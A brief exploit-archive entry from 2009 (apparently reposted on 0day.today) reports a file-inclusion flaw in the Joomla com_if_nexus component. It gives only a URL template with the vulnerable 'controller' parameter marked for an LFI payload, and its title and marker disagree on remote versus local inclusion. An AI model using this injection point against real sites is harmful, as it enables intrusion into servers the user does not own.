id: 10480
date: 12/28/2009
title: Joomla Component com_if_nexus Remote File Include
author: Fl0riX
cves: 

=================================================
Joomla Component com_if_nexus Remote File Include
=================================================

@~~=======================================~~@
@~~=Script :Joomla Component com_if_nexus
@~~=======================================~~@
@~~=Vuln
 
: http://site/ [Yol] /index.php?option=com_if_nexus&controller=[-LFI-]



#  0day.today [2023-03-27]  #